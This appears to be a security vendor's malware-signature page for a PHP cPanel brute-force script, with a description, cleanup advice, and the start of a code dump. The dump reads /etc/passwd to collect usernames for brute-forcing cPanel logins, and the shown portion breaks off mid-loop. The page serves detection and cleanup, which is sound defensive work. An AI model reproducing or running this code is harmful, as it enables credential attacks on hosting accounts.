Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.exploit.cpanelbruteforce.001.001

php.exploit.cpanelbruteforce.001.001

PHP exploits are server-side malicious scripts which are commonly used as exploit. Exploit is piece of code that takes advantage of a bug, glitch or vulnerability, usually to gain control of a system it aims on. Typical targets are admin sections of various Content Management Systems or Website Administration Systems such as cPanel and others.
This script will genereate a bruteforce against cPanel login page of the infected host. It grabs the users from /etc/passwd and stores a local logfile.

Affecting

Any vulnerable website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Cleanup is done by deleting the malicious code inside the file or replacing it with a fresh version. The infection can be found in your system by searching for parts of the dump below inside your site's files and also checking for unknown daemonised perl process.
You can also sign up with us and let our team remove the malware for you.

Dump

<?php
echo "<html>";
echo "<title>cPanel brute forcer</title><body>";

set_time_limit(0);
##################
@$passwd=fopen('/etc/passwd','r');
if (!$passwd) {
echo "[-] Error : coudn't read /etc/passwd";
exit;
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;

while(!feof($passwd)) {
$str=fgets($passwd);
if ($i>35) {